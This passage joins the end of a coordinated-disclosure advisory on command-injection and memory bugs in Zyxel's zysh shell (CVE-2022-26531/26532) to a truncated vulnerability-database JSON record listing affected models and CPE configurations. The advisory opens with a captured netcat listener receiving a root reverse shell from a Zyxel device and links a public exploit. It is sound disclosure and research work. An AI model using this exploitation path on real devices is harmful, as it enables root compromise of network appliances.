raptor@gollum:~$ nc -nvlp 23234 Listening on 0.0.0.0 23234 Connection received on 54330 bash: cannot set terminal process group (25792): Inappropriate ioctl for device bash: no job control in this shell bash-5.1# uname -a uname -a Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon #2 Fri Sep 24 00:34:21 CST 2021 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7010p1.2-800-AAP) GNU/Linux bash-5.1# id id uid=0(root) gid=10000(operator) groups=0(root),10000(operator) bash-5.1#

Of course, you can choose to execute your favorite Python code instead.

Apparently, we managed to find a way to connect the standard input of the Web Console to the standard input of the python process we spawned with the first command, in a mind-bending exploit. To preserve our sanity, we have not thoroughly investigated how this is happening... but it works! And it is very reliable.

On our test device, this exploitation vector only works from the Web Console, as an authenticated admin or limited-admin user. As an added benefit, as we have seen, the Web Console spawns zysh as root.

We do not exclude other ways to exploit the described vulnerability, perhaps by creating or overwriting critical system files. It could also be easily abused to clobber arbitrary files and cause a Denial of Service condition on vulnerable devices, although we are not going to provide a proof-of-concept exploit for this (we are pretty sure you can easily figure it out on your own anyway).

--[ 6 - Affected products

According to Zyxel, zysh is present on a wide range of products, including their security appliances such as FLEX, ATP, USG, VPN, and ZyWALL [9], AP controllers and APs.

Our audit was conducted exclusively on a Zyxel USG20-VPN test device with Firmware 5.10. However, other products and firmware versions have been confirmed by Zyxel to be affected by the same vulnerabilities.

--[ 7 - Remediation

During the whole coordinated disclosure process, Zyxel was very responsive. Working with them has been a pleasure and we would like to publicly acknowledge it, as unfortunately this is not always the case with every vendor.

The memory corruption bugs were collectively assigned CVE-2022-26531, while the OS command injection vulnerability was assigned CVE-2022-26532. Please refer to their advisory for patching information.

We have not checked the effectiveness of the fixes.

--[ 8 - Disclosure timeline

2022-02-25: Zyxel was notified via security@zyxel.com.tw. 2022-02-25: Zyxel acknowledged our vulnerability reports. 2022-03-17: Zyxel assigned CVE-2022-26531 and CVE-2022-26532 to the reported issues and informed us of their intention to publish their security advisory on 2022-05-24. 2022-03-18: As a token of their appreciation, Zyxel gave us a certificate of recognition. 2022-05-24: Zyxel published their security advisory, following our coordinated disclosure timeline. 2022-06-07: HN Security published this advisory with full details.

--[ 9 - References

[0] https://www.zyxel.com/ [1] https://security.humanativaspa.it/tag/zyxel/ [2] https://www.dropbox.com/s/kvm5xwxqfrwge0t/USG20-VPN_5.10.zip?dl=1 [3] https://en.wikipedia.org/wiki/MIPS_architecture [4] https://gtfobins.github.io/gtfobins/tcpdump/ [5] https://www.tcpdump.org/manpages/tcpdump.1.html [6] https://twitter.com/pulsoid/status/1368146791473045504 [7] http://phrack.org/issues/70/13.html#article [8] https://github.com/0xdea/exploits/blob/master/zyxel/raptor_zysh_fhtagn.exp [9] https://support.zyxel.eu/hc/en-us/articles/360013941859

Copyright (c) 2022 Marco Ivaldi and Humanativa Group. All rights reserved

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202205-1789",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "usg flex 100w",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "usg20",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "nwa210ax",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.30\\(abtd.2\\)"
      },
      {
        "model": "atp800",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "usg 20w",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "wac5302d-s",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.10\\(abfh.10\\)"
      },
      {
        "model": "usg 20w-vpn",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "atp100",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "usg 40w",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "wac500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.30\\(abvs.2\\)"
      },
      {
        "model": "nsg50",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "1.33"
      },
      {
        "model": "usg flex 500",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.50"
      },
      {
        "model": "usg 40",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "usg 60w",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "atp700",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.32"
      },
      {
        "model": "usg 1900",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "usg 40w",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "vpn50",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.30"
      },
      {
        "model": "nwa50ax",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(abyw.5\\)"
      },
      {
        "model": "usg210",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "usg 310",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "atp100",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.32"
      },
      {
        "model": "nxc2500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.10\\(aaig.3\\)"
      },
      {
        "model": "nsg100",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "1.33"
      },
      {
        "model": "wac6553d-s",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(aasg.7\\)"
      },
      {
        "model": "usg200",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "wac6552d-s",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(abio.7\\)"
      },
      {
        "model": "nsg300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "1.33"
      },
      {
        "model": "usg2200",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "nap353",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(abey.7\\)"
      },
      {
        "model": "usg 60",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "nap203",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(abfa.7\\)"
      },
      {
        "model": "wax650s",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.30\\(abrm.2\\)"
      },
      {
        "model": "nwa55axe",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(abzl.5\\)"
      },
      {
        "model": "usg 110",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "usg 110",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "usg flex 200",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.50"
      },
      {
        "model": "nsg50",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "1.00"
      },
      {
        "model": "nwa90ax",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.27\\(accv.2\\)"
      },
      {
        "model": "nxc5500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.10\\(aaos.3\\)"
      },
      {
        "model": "wac6103d-i",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(aaxh.7\\)"
      },
      {
        "model": "usg flex 200",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "usg 20w",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "nwa5123-ac-hd",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(abim.6\\)"
      },
      {
        "model": "wax510d",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.30\\(abtf.2\\)"
      },
      {
        "model": "wac5302d-sv2",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(abvz.6\\)"
      },
      {
        "model": "usg 1900",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "nwa1302-ac",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(abku.6\\)"
      },
      {
        "model": "atp800",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.32"
      },
      {
        "model": "usg 20w-vpn",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "atp700",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "usg20",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "nsg100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "1.33"
      },
      {
        "model": "nap303",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(abex.7\\)"
      },
      {
        "model": "vpn300",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.30"
      },
      {
        "model": "usg 2200-vpn",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "usg 2200-vpn",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "usg 40",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "usg 60w",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "usg 1100",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "wac500h",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.30\\(abwa.2\\)"
      },
      {
        "model": "nwa110ax",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.30\\(abtg.2\\)"
      },
      {
        "model": "nwa1123acv3",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.30\\(abvt.2\\)"
      },
      {
        "model": "atp500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "nsg300",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "1.00"
      },
      {
        "model": "wac6303d-s",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(abgl.6\\)"
      },
      {
        "model": "usg flex 500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "wax630s",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.30\\(abzd.2\\)"
      },
      {
        "model": "usg210",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "vpn300",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "vpn100",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.30"
      },
      {
        "model": "wac6503d-s",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(aasf.7\\)"
      },
      {
        "model": "atp100w",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "atp500",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.32"
      },
      {
        "model": "usg 310",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "nsg50",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "1.33"
      },
      {
        "model": "vpn1000",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.30"
      },
      {
        "model": "nwa1123-ac-pro",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(abhd.7\\)"
      },
      {
        "model": "usg 1100",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "nsg100",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "1.00"
      },
      {
        "model": "usg200",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "nsg300",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "1.33"
      },
      {
        "model": "wac6502d-e",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(aasd.7\\)"
      },
      {
        "model": "atp100w",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.32"
      },
      {
        "model": "vpn100",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "atp200",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "usg2200",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "usg310",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "usg310",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "usg flex 100",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.50"
      },
      {
        "model": "nwa1123-ac-hd",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(abin.6\\)"
      },
      {
        "model": "vpn1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "usg300",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "wac6502d-s",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.25\\(aase.7\\)"
      },
      {
        "model": "usg300",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.09"
      },
      {
        "model": "usg flex 100",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "usg flex 700",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "atp200",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.32"
      },
      {
        "model": "vpn50",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "5.21"
      },
      {
        "model": "usg flex 700",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.50"
      },
      {
        "model": "wax610d",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "6.30\\(abte.2\\)"
      },
      {
        "model": "usg 60",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.71"
      },
      {
        "model": "usg flex 100w",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "zyxel",
        "version": "4.50"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-26532"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.30",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.30",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.30",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.30",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.32",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.32",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.32",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.32",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.32",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "5.21",
                    "versionStartIncluding": "4.32",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_110_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_110:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_1100_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_1100:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_1900_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_1900:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w-vpn:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_2200-vpn_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_2200-vpn:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_310_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_310:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:zyxel:usg_40_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "4.71",
                    "versionStartIncluding": "4.09",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:zyxel:usg_40:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
